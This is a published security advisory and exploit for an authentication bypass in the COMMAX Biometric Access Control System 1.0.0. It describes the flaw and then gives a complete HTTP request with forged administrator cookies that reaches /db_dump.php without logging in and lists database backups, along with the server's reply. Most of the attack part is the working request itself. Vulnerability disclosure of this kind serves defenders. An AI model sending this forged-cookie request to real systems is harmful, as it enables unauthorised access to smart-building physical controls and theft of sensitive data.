# Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX Biometric Access Control System 1.0.0 Authentication Bypass
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0
Summary: Biometric access control system.
Desc: The application suffers from an authentication bypass vulnerability.
An unauthenticated attacker through cookie poisoning can bypass authentication
and disclose sensitive information and circumvent physical controls in smart
homes and buildings.
Tested on: nginx/1.14.0 (Ubuntu)
MariaDB/10.3.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5661
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
02.08.2021
--
The following request with Cookie forging bypasses authentication and lists available SQL backups.
GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/user_add.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
Connection: close
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 03 Aug 1984 14:07:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10316
<!DOCTYPE html>
<html class="no-js" lang="ko">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>::: COMMAX :::</title>
...
...